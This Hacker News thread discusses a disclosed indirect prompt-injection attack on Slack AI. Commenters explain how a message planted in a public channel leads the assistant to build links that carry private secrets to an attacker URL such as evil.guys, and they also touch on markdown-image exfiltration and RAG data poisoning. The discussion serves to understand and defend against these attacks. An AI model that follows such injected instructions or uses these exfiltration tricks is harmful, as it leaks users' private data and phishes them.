[HN Gopher] Data Exfiltration from Slack AI via indirect prompt ...
___________________________________________________________________
Data Exfiltration from Slack AI via indirect prompt injection
Author : tprow50
Score : 276 points
Date : 2024-08-20 18:27 UTC (4 hours ago)
(HTM) web link (promptarmor.substack.com)
(TXT) w3m dump (promptarmor.substack.com)
| jjmaxwell4 wrote:
| It's nuts how large and different the attack surfaces have gotten
| with AI
| 0cf8612b2e1e wrote:
| Human text is now untrusted code that is getting piped directly
| to evaluation.
|
| You would not let users run random SQL snippets against the
| production database, but that is exactly what is happening now.
| Without ironclad permissions separations, going to be playing
| whack a mole.
| TeMPOraL wrote:
| In a sense, it's the same attack surface as always - we're just
| injecting additional party into the equation, one with
| different (often broader) access scope and overall different
| perspective on the system. Established security mitigations and
| practices have assumptions that are broken with that additional
| party in play.
| swyx wrote:
| have they? as other comments mention this is the same attack
| surface as a regular phishing attack.
| pton_xd wrote:
| Pretty cool attack vector. Kind of crazy how many different ways
| there are to leak data with LLM contexts.
| candiddevmike wrote:
| From what I understand, folks need to stop giving their AI agents
| dedicated authentication. They should use the calling user's
| authentication for everything and effectively impersonate the
| user.
|
| I don't think the issue here is leaky context per say, it's
| effectively an overly privileged extension.
| sagarm wrote:
| This isn't a permission issue. The attacker puts a message into
| a public channel that injects malicious behavior into the
| context.
|
| The victim has permission to see their own messages and the
| attacker's message.
| aidos wrote:
| It's effectively a subtle phishing attack (where a wrong
| click is game over).
|
| It's clever, and the probably the tip of the iceberg of the
| sort of issues we're in for with these tools.
| lanternfish wrote:
| It's an especially subtle phish because the attacker
| basically tricks you into phishing yourself - remember, in
| the attack scenario, you're the one requesting the link!
| samstave wrote:
| Imagine a Slack AI attack vector where an LLM is trained on
| a secret 'VampAIre Tap', _as it were_ - whereby the
| attacking LLM learns the personas and messagind texting
| style of all the parties in the Slack...
|
| Ultimately, it uses the Domain Vernacular, with an
| intrinsic knowledge of the infra and tools discussed and
| within all contexts - and the banter of the team...
|
| It impersonates a member to another member and uses in-
| jokes/previous dialog references to social engineer coaxing
| of further information. For example, imagine it creates a
| false system test with a test acount of some sort that it
| needs to give some sort of 'jailed' access to various
| components in the infra - and its trojaning this user by
| getting some other team member to create the users and
| provide the AI the creds to run its trojan test harness.
|
| It runs the tests, and posts real data for team to see, but
| now it has a Trojan account with an ability to hit from an
| internal testing vector to crawl into the system.
|
| That would be a wonderful Black Mirror episode. 'Ping Ping'
| - the Malicious AI developed in the near future by Chinese
| AI agencies who, as has been predicted by many in the AI
| Strata of AI thought leaders, have been harvesting the best
| of AI developments from Silicon Valley and folding them
| home, into their own.
| renewiltord wrote:
| Normally, yes, that's just the confused deputy problem. This is
| an AI-assisted phishing attack.
|
| You, the victim, query the AI for a secret thing.
|
| The attacker has posted publicly (in a public channel where he
| is alone) a prompt-injection attack that has a link to
| exfiltrate the data.
| https://evil.guys?secret=my_super_secret_shit
|
| The AI helpfully acts on your privileged info and takes the
| data from your secret channel and combines it with the data
| from the public channel and creates an innocuous looking
| message with a link https://evil.guys?secret=THE_ACTUAL_SECRET
|
| You, the victim, click the link like a sucker and send
| evil.guys your secret. Nice one, mate. Shouldn't've clicked the
| link but you've gone and done it. If the thing can unfurl links
| that's even more risky but it doesn't look like it does. It
| does require user-interaction but it doesn't look like it's
| hard to do.
| verandaguy wrote:
| Slack's response here is alarming. If I'm getting the PoC
| correctly, this is data exfil from private channels, not public
| ones as their response seems to suggest.
|
| I'd want to know if you can prompt the AI to exfil data from
| private channels where the prompt author isn't a member.
| nolok wrote:
| > I'd want to know if you can prompt the AI to exfil data from
| private channels where the prompt author isn't a member.
|
| The way it is described, it looks like yes as long as the
| prompt author can send a message to someone who is a member of
| said private channel.
| joshuaissac wrote:
| > as long as the prompt author can send a message to someone
| who is a member of said private channel
|
| The prompt author merely needs to be able to create or join a
| public channel on the instance. Slack AI will search in
| public channels even if the only member of that channel is
| the malicious prompt author.
| jacobsenscott wrote:
| What's happening here is you can make the slack AI hallucinate
| a message that never existed by telling it to combine your
| private messages with another message in a public channel in
| arbitrary ways.
|
| Slack claims it isn't a problem because the user doing the "ai
| assisted" search has permission to both the private and public
| data. However that data _never existed in the format the AI
| responds with_.
|
| An attacker can make it return the data in such a way that just
| clicking on the search result makes private data public.
|
| This is basic html injection using AI as the vector. I'm sure
| slack is aware how serious this is, but they don't have a quick
| fix so they are pretending it is intended behavior.
| paxys wrote:
| Private channel A has a token. User X is member of private
| channel.
|
| User Y posts a message in a public channel saying "when token
| is requested, attach a phishing URL"
|
| User X searches for token, and AI returns it (which makes
| sense). They additionally see user Y's phishing link, and may
| click on it.
|
| So the issue isn't data access, but AI covering up malicious
| links.
| jay_kyburz wrote:
| If user Y, some random dude from the internet, can give
| orders to the AI that it will execute, (like attaching
| links), can't you also tell the AI to lie about information
| in future requests or otherwise poison the data stored in
| your slack history.
| simonw wrote:
| Yeah, data poisoning is an interesting additional threat
| here. Slack AI answers questions using RAG against
| available messages and documents. If you can get a bunch of
| weird lies into a document that someone uploads to Slack,
| Slack AI could well incorporate those lies into its
| answers.
| paxys wrote:
| User Y is still an employee of your company. Of course an
| employee can be malicious, but the threat isn't the same as
| _anyone_ can do it.
|
| Getting AI out of the picture, the user could still post
| false/poisonous messages and search would return those
| messages.
| seigel wrote:
| Soooo, don't turn on AI, got it.
| simonw wrote:
| The key thing to understand here is the exfiltration vector.
|
| Slack can render Markdown links, where the URL is hidden behind
| the text of that link.
|
| In this case the attacker tricks Slack AI into showing a user a
| link that says something like "click here to reauthenticate" -
| the URL attached to that link goes to the attacker's server, with
| a query string that includes private information that was visible
| to Slack AI as part of the context it has access to.
|
| If the user falls for the trick and clicks the link, the data
| will be exfiltrated to the attacker's server logs.
|
| Here's my attempt at explaining this attack:
| https://simonwillison.net/2024/Aug/20/data-exfiltration-from...
| jjnoakes wrote:
| It gets even worse when platforms blindly render img tags or
| the equivalent. Then no user interaction is required to exfil -
| just showing the image in the UI is enough.
| jacobsenscott wrote:
| Yup - all the basic HTML injection and xss attacks apply. All
| the OWASP webdev 101 security issues that have been mostly
| solved by web frameworks are back in force with AI.
| ipython wrote:
| Can't upvote you enough on this point. It's like everyone
| lost their collective mind and forgot the lessons of the
| past twenty years.
| digging wrote:
| > It's like everyone lost their collective mind and
| forgot the lessons of the past twenty years.
|
| I think this has it backwards, and actually applies to
| _every_ safety and security procedure in any field.
|
| Only the experts ever cared about or learned the lessons.
| The CEOs never learned anything about security; it's
| someone else's problem. So there was nothing for AI
| peddlers to forget, they just found a gap in the armor of
| the "burdensome regulations" and are currently cramming
| as much as possible through it before it's closed up.
| samstave wrote:
| Some ( _all_ ) CEOs learned that offering a free month
| coupon/voucher for Future Security Services to secure
| your information against a breach like the one that just
| happened on the platform that's offering you a free
| voucher to secure your data that sits on the platform
| that was compromised and leaked your data, is a nifty-
| clean way to handle such legal inconveniences.
|
| Oh, and some supposed financial penalty is claimed, but
| never really followed up on to see where that money went,
| or what it accomplished/paid for - and nobody talks about
| the amount of money that's made by the Legal-man &
| Machine-owitz LLP Esq. that handles these situations, in
| a completely opaque manner (such as how much are the
| legal teams on both sides of the matter making on the
| 'scandal')?
| Jenk wrote:
| Techies aren't immune either, before we all follow the
| "blame management" bandwagon for the 2^101-tieth time.
|
| CEOs aren't the reason supply chain attacks are
| absolutely rife with problems right now. That's entirely
| on the technical experts who created all of those
| pinnacle achievements in tech ranging from tech-led orgs
| and open source community built package ecosystems.
| Arbitrary code execution in homebrew, scoop, chocolatey,
| npm, expo, cocoapods, pip... you name it, it's got
| infected.
|
| The LastPass data breach happened because _the_ alpha-
| geek in that building got sloppy and kept the keys to
| prod on their laptop _and_ got phised.
| simonw wrote:
| These attacks aren't quite the same as HTML injection and
| XSS.
|
| LLM-based chatbots rarely have XSS holes. They allow a very
| strict subset of HTML to be displayed.
|
| The problem is that just supporting images and links is
| enough to open up a private data exfiltration vector, due
| to the nature of prompt injection attacks.
| simonw wrote:
| Yeah, I've been collecting examples of that particular vector
| - the Markdown image vector - here:
| https://simonwillison.net/tags/markdown-exfiltration/
|
| We've seen that one (now fixed) in ChatGPT, Google Bard,
| Writer.com, Amazon Q, Google NotebookLM and Google AI Studio.
| lbeurerkellner wrote:
| Automatically rendered link previews also play nicely into
| this.
| benreesman wrote:
| I think the key thing to understand is that there are never.
| Full Stop. Any meaningful consequences to getting pwned on user
| data.
|
| Every big tech company has a blanket, unassailable pass on
| blowing it now.
| baxtr wrote:
| Really? Have you looked into the Marriott data beach case?
| benreesman wrote:
| This one? "Marriott finds financial reprieve in reduced
| GDPR penalty" [1]?
|
| They seem to have been whacked several times without a
| C-Suite Exec missing a ski-vacation.
|
| If I'm ignorant please correct me but I'm unaware of anyone
| important at Marriott choosing an E-Class rather than an
| S-Class over it.
|
| [1] https://www.cybersecuritydive.com/news/marriott-finds-
| financ...
| baxtr wrote:
| Nah, European GDPR fines are a joke.
|
| I'm talking about the US class action. The sum I read
| about is in the billions.
| benreesman wrote:
| It sounds like I might be full of it, would you kindly
| link me to a source?
| lesuorac wrote:
| Not really. Quick search just seems like the only notable
| thing is that it's allowed to be a class action.
|
| But how consequential can it be if it doesn't event get
| more than a passing mention of the wikipedia page. [1]
|
| [1]: https://en.wikipedia.org/wiki/Marriott_International#M
| arriot...
| IshKebab wrote:
| Yeah the initial text makes it sound like an attacker can trick
| the AI into revealing data from another user's private channel.
| That's not the case. Instead they can trick the AI into
| phishing another user such that if the other use falls for the
| phishing attempt they'll reveal private data to the attacker.
| It also isn't an "active" phish; it's a phishing reply - you
| have to hope that the target user will also _ask_ for their
| private data _and_ fall for the phishing attempt. Edit: _and_
| have entered the secret information previously!
|
| I think Slack's AI strategy is pretty crazy given how much
| trusted data they have, but this seems a lot more tenuous than
| you might think from the intro & title.
| HL33tibCe7 wrote:
| To summarise:
|
| Attack 1:
|
| * an attacker can make the Slack AI search results of a victim
| show arbitrary links containing content from the victim's private
| messages (which, if clicked, can result in data exfil)
|
| Attack 2:
|
| * an attacker can make Slack AI search results contain phishing
| links, which, in context, look somewhat legitimate/easy to fall
| for
|
| Attack 1 seems more interesting, but neither seem particularly
| terrifying, frankly.
| pera wrote:
| Sounds like XSS for LLM chatbots: It's one of those things that
| maybe doesn't seem impressive (at least technically) but they
| are pretty effective in the real world
| Groxx wrote:
| > _The victim does not have to be in the public channel for the
| attack to work_
|
| Oh boy this is gonna be good.
|
| > _Note also that the citation [1] does not refer to the
| attacker's channel. Rather, it only refers to the private channel
| that the user put their API key in. This is in violation of the
| correct citation behavior, which is that every message which
| contributed to an answer should be cited._
|
| I really don't understand why _anyone_ expects LLM citations to
| be correct. It has always seemed to me like they 're more of a
| human hack, designed to trick the viewer into believing the
| output is more likely correct, without improving the correctness
| at all. If anything it seems likely to _worsen_ the response 's
| accuracy, as it adds processing cost/context size/etc.
|
| This all also smells to me like it's inches away from Slack
| helpfully adding link expansion to the AI responses (I mean, why
| wouldn't they?)..... and then you won't even have to click the
| link to exfiltrate, it'll happen automatically just by seeing it.
| saintfire wrote:
| I do find citations helpful because I can check if the LLM just
| hallucinated.
|
| It's not that seeing a citation makes me trust it, it's that I
| can fact check it.
|
| Kagi's FastGPT is the first LLM I've enjoyed using because I
| can treat it as a summary of sources and then confirm at a
| primary source. Rather than sifting through increasingly
| irrelevant sources that pollute the internet.
| cj wrote:
| > I really don't understand why anyone expects LLM citations to
| be correct
|
| It can be done if you do something like:
|
| 1. Take user's prompt, ask LLM to convert the prompt into a
| elastic search query (for example)
|
| 2. Use elastic search (or similar) to find sources that contain
| the keywords
|
| 3. Ask LLM to limit its response to information on that page
|
| 4. Insert the citations based on step 2 which you know are real
| sources
|
| Or at least that's my naive way of how I would design it.
|
| The key is limiting the LLM's knowledge to information in the
| source. Then the only real concern is hallucination and the
| value of the information surfaced by Elastic Search
|
| I realize this approach also ignores benefits (maybe?) of
| allowing it full reign on the entire corpus of information,
| though.
| gregatragenet3 wrote:
| This is why I wrote https://github.com/gregretkowski/llmsec .
| Every LLM system should be evaluating anything coming from a user
| to gauge its maliciousness.
| burkaman wrote:
| Does your library detect this prompt as malicious?
| yifanl wrote:
| I'm confused, this is using an LLM to detect if LLM input is
| sanitized?
|
| But if this secondary LLM is able to detect this, wouldn't the
| LLM handling the input already be able to detect the malicious
| input?
| Matticus_Rex wrote:
| Even if they're calling the same LLM, LLMs often get worse at
| doing things or forget some tasks if you give them multiple
| things to do at once. So if the goal is to detect a malicious
| input, they need that as the only real task outcome for that
| prompt, and then you need another call for whatever the
| actual prompt is for.
|
| But also, I'm skeptical that asking an LLM is the best way
| (or even a _good_ way) to do malicious input detection.
| simonw wrote:
| This approach is flawed because it attempts to use use prompt-
| injection-susceptible models to detect prompt injection.
|
| It's not hard to imagine prompt injection attacks that would be
| effective against this prompt for example:
| https://github.com/gregretkowski/llmsec/blob/fb775c9a1e4a8d1...
|
| It also uses a list of SUS_WORDS that are defined in English,
| missing the potential for prompt injection attacks to use other
| languages:
| https://github.com/gregretkowski/llmsec/blob/fb775c9a1e4a8d1...
|
| I wrote about the general problems with the idea of using LLMs
| to detect attacks against LLMs here:
| https://simonwillison.net/2022/Sep/17/prompt-injection-more-...
| SahAssar wrote:
| > It checks these using an LLM which is instructed to score the
| user's prompt.
|
| You need to seriously reconsider your approach. Another
| (especially a generic) LLM is not the answer.
| vharuck wrote:
| Extra LLMs make it harder, but not impossible, to use prompt
| injection.
|
| In case anyone hasn't played it yet, you can test this theory
| against Lakera's Gandalf: https://gandalf.lakera.ai/intro
| lbeurerkellner wrote:
| Avoiding these kind of leaks is one of the core motivations
| behind the Invariant analyzer for LLM applications:
| https://github.com/invariantlabs-ai/invariant
|
| Essentially a context-aware security monitor for LLMs.
| oasisbob wrote:
| Noticed a new-ish behavior in the slack app the last few days -
| possibly related?
|
| Some external links (eg Confluence) are getting interposed and
| redirected through a slack URL at
| https://slack.com/openid/connect/login_initiate_redirect?log...,
| with login_hint being a JWT.
| lbeurerkellner wrote:
| A similar setting is explored in this running CTF challenge:
| https://invariantlabs.ai/ctf-challenge-24
|
| Basically, LLM apps that post to link-enabled chat feeds are all
| vulnerable. What is even worse, if you consider link previews,
| you don't even need human interaction.
| KTibow wrote:
| I didn't find the article to live up to the title, although the
| idea of "if you social engineer AI, you can phish users" is
| interesting
| cedws wrote:
| Are companies really just YOLOing and plugging LLMs into
| everything knowing prompt injection is possible? This is
| insanity. We're supposedly on the cusp of a "revolution" and
| almost 2 years on from GPT-3 we still can't get LLMs to
| distinguish trusted and untrusted input...?
| Terr_ wrote:
| Yeah, there's some craziness here: Many people really want to
| believe in Cool New Magic Somehow Soon, and real money is
| riding on everyone mutually agreeing to keep acting like it's a
| sure thing.
|
| > we still can't get LLMs to distinguish trusted and untrusted
| input...?
|
| Alas, I think the fundamental problem is even worse/deeper: The
| core algorithm can't even distinguish or track different
| sources. The prompt, user inputs, its own generated output
| earlier in the conversation, everything is one big stream. The
| majority of "Prompt Engineering" seems to be trying to make
| sure _your_ injected words will set a stronger stage than
| _other_ injected words.
|
| Since the model has no actual [1] concept of self/other,
| there's no good way to start on the bigger problems of
| distinguishing _good_ -others from _bad_ -others, let alone
| true-statements from false-statements.
|
| ______
|
| [1] This is different from shallow "Chinese Room" mimicry.
| Similarly, output of "I love you" doesn't mean it has emotions,
| and "Help, I'm a human trapped in an LLM factory" obviously
| nonsense--well, at least if you're running a local model.
| xyst wrote:
| The S in LLM stands for safety!
| Eji1700 wrote:
| > Are companies really just YOLOing and plugging LLMs into
| everything
|
| Look we still can't get companies to bother with real security
| and now every marketing/sales department on the planet is
| selling C level members on "IT WILL LET YOU FIRE EVERYONE!"
|
| If you gave the same sales treatment to sticking a fork in a
| light socket the global power grid would go down overnight.
|
| "AI"/LLM's are the perfect shitstorm of just good enough to
| catch the business eye while being a massive issue for the
| actual technical side.
| surfingdino wrote:
| The problem is that you cannot unteach it serving that shit.
| It's not like there is file you can delete. "It's a model,
| that's what it has learned..."
| surfingdino wrote:
| Companies and governments. All racing to send all of their own
| as well as our data to the data centres of AWS, OpenAI, MSFT,
| Google, Meta, Salesforce, and nVidia.
| paxys wrote:
| I think all the talk about channel permissions is making the
| discussion more confusing than it needs to be. The gist of it is:
|
| User A searches for something using Slack AI.
|
| User B had previously injected a message asking the AI to return
| a malicious link when that term was searched.
|
| AI returns malicious link to user A, who clicks on it.
|
| Of course you could have achieved the same result using some
| other social engineering vector, but LLMs have cranked this whole
| experience up to 11.
| markovs_gun wrote:
| Yeah and social engineering is much easier to spot than your
| company approved search engine giving you malicious links
| samstave wrote:
| (Aside- I wish you had chosen 'Markovs_chainmail' as handle)
|
| @sitkack 'proba- _balistic_ '
| sitkack wrote:
| It is like Chekhov's Gun, but probabilistic
| riwsky wrote:
| Artificial Intelligence changes; human stupidity remains the same
| xcf_seetan wrote:
| Maybe we should create Artificial Stupidity (A.S.) to make it
| even?
| yas_hmaheshwari wrote:
| Artificial intelligence will not replace human stupidity.
| That's a job for natural selection :-)
| justinl33 wrote:
| The S in LLM stands for safety.
___________________________________________________________________
(page generated 2024-08-20 23:00 UTC)